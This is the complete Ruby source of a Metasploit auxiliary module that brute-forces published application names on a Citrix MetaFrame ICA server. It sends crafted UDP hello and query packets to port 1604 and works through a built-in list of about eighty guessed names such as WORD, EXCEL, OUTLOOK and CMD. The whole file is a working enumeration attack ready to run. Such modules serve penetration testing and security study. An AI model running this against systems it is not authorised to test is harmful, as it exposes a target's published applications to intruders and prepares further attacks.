##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
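class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp

  # All wire constants are forced to binary (.b) so that slicing/appending
  # against socket data, which Rex returns as ASCII-8BIT, never depends on the
  # source encoding the module loader happens to apply.

  # Initial ICA browser "hello" datagram sent to the service.
  CLIENT_HELLO =
    "\x1e\x00\x01\x30\x02\xfd\xa8\xe3\x00\x00\x00\x00\x00\x00\x00\x00" \
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".b.freeze

  # Expected leading bytes of the reply to CLIENT_HELLO.
  SERVER_HELLO_PREFIX =
    "\x30\x00\x02\x31\x02\xfd\xa8\xe3\x02\x00\x06\x44".b.freeze

  # Leading bytes of a reply meaning the queried application is published.
  APP_FOUND_PREFIX =
    "\x3e\x00\x02\x35\x02\xfd\xa8\xe3\x02\x00\x06\x44".b.freeze

  # Leading bytes of a reply meaning the queried application is not published.
  APP_NOT_FOUND_PREFIX =
    "\x20\x00\x01\x3a\x02\xfd\xa8\xe3\x02\x00\x06\x44".b.freeze

  # Longest application name that still fits the one-byte length fields in
  # the request (52 + name length must stay <= 255).
  MAX_APP_NAME_LENGTH = 255 - 52

  # Seconds to wait for each UDP reply.
  READ_TIMEOUT = 3

  # Published-application names tried in order (kept as in the original list).
  APPLICATIONS = [
    'TEST',
    'NOTEPAD',
    'ACROBAT READER',
    'ACROBAR',
    'EXPLORER',
    'WORD',
    'WORD2K',
    'WORDXP',
    'WORD2K3',
    'WORD2K7',
    'WORD 2000',
    'WORD XP',
    'WORD 2003',
    'WORD 2007',
    'WORD2000',
    'WORD2003',
    'WORD2007',
    'EXCEL',
    'EXCEL2K',
    'EXCELXP',
    'EXCEL2K3',
    'EXCEL2K7',
    'EXCEL 2000',
    'EXCEL XP',
    'EXCEL 2003',
    'EXCEL 2007',
    'EXCEL2000',
    'EXCEL2003',
    'EXCEL2007',
    'ACCESS',
    'ACCESS2K',
    'ACCESSXP',
    'ACCESS2K3',
    'ACCESS2K7',
    'ACCESS 2000',
    'ACCESS XP',
    'ACCESS 2003',
    'ACCESS 2007',
    'ACCESS2000',
    'ACCESS2003',
    'ACCESS2007',
    'POWERPOINT',
    'POWERPOINT2K',
    'POWERPOINTXP',
    'POWERPOINT2K3',
    'POWERPOINT2K7',
    'POWERPOINT 2000',
    'POWERPOINT XP',
    'POWERPOINT 2003',
    'POWERPOINT 2007',
    'POWERPOINT2000',
    'POWERPOINT2003',
    'POWERPOINT2007',
    'OUTLOOK',
    'OUTLOOKXP',
    'OUTLOOK2K',
    'OUTLOOK2K3',
    'OUTLOOK2K7',
    'OUTLOOK 2000',
    'OUTLOOK XP',
    'OUTLOOK 2003',
    'OUTLOOK 2007',
    'OUTLOOK2000',
    'OUTLOOK2003',
    'OUTLOOK2007',
    'LOTUS',
    'LOTUS NOTES',
    'INTERNETEXPLORER',
    'IE',
    'IEXPLORER',
    'FIREFOX',
    'FIREFOX 3',
    'NETSCAPE',
    'NETSCAPE7',
    'NETSCAPE6',
    'MAIL',
    'EMAIL',
    'E-MAIL',
    'INTERNET',
    'CMD',
    'COMMAND'
  ].freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Citrix MetaFrame ICA Published Applications Bruteforcer',
        'Description' => %q{
          This module attempts to brute force program names within the Citrix
          Metaframe ICA server.
        },
        'Author' => [ 'aushack' ],
        'References' => [
          [ 'OSVDB', '50617' ],
          [ 'BID', '5817' ]
        ],
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(1604),
      ]
    )
  end

  # Returning false opts this module out of framework-driven automatic runs.
  def autofilter
    false
  end

  # Sends the ICA hello, and if the service answers with the expected prefix,
  # queries each name in APPLICATIONS and reports whether it is published.
  #
  # A reply that times out (udp_sock.get returns nil) is handled explicitly
  # instead of raising NoMethodError on a nil slice, and the socket is always
  # released via ensure even if a send/receive raises.
  def run
    connect_udp

    print_status("Attempting to contact Citrix ICA service...")

    udp_sock.put(CLIENT_HELLO)
    res = udp_sock.get(READ_TIMEOUT)

    if res.nil?
      print_error("Server did not respond.")
      return
    end

    unless response_matches?(res, SERVER_HELLO_PREFIX)
      print_error("Reply did not match the expected ICA hello; aborting.")
      return
    end

    print_status("Citrix ICA Server Detected. Attempting to brute force Published Applications.")

    # Random client name embedded in each request.
    client = Rex::Text.rand_text_alphanumeric(8)

    APPLICATIONS.each do |application|
      udp_sock.put(build_app_request(application, client))
      res = udp_sock.get(READ_TIMEOUT)

      # The two prefixes differ in their first byte, so at most one matches.
      if response_matches?(res, APP_FOUND_PREFIX)
        print_status("Found: #{application}")
      elsif response_matches?(res, APP_NOT_FOUND_PREFIX)
        print_error("NOT Found: #{application}")
      else
        vprint_status("No recognised reply for #{application}; skipping")
      end
    end
  ensure
    # disconnect_udp tolerates a nil/already-closed socket, so this is safe
    # even when connect_udp itself failed.
    disconnect_udp
  end

  private

  # @param res [String, nil] raw UDP reply, nil when the read timed out
  # @param signature [String] binary prefix to compare against
  # @return [Boolean] true when +res+ begins with +signature+
  #
  # A slice comparison is used rather than start_with? so that a nil or
  # incompatibly-encoded reply yields false instead of raising.
  def response_matches?(res, signature)
    return false if res.nil?

    res[0, signature.length] == signature
  end

  # Builds the "is this application published?" request.
  #
  # The layout is the original module's byte-for-byte; the two single-byte
  # length fields are derived from the application name length.
  #
  # @param application [String] application name to query
  # @param client [String] client name to embed in the request
  # @return [String] binary request datagram
  # @raise [ArgumentError] if the name would overflow a one-byte length field
  #   (pack('C') would otherwise silently truncate it)
  def build_app_request(application, client)
    if application.bytesize > MAX_APP_NAME_LENGTH
      raise ArgumentError, "application name too long: #{application.bytesize} bytes"
    end

    packet = [52 + application.bytesize].pack('C')
    packet << "\x00\x02\x34\x02\xfd\xa8\xe3\x00\x00\x00\x00\x00\x00\x00\x00".b
    packet << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\x00\x02\x00".b
    packet << [39 + application.bytesize].pack('C')
    packet << "\x00\x00\x00\x00\x00".b
    packet << application
    packet << "\x00\x01\x00\x04\x00".b
    packet << client
    packet << "\x00".b
    packet
  end
end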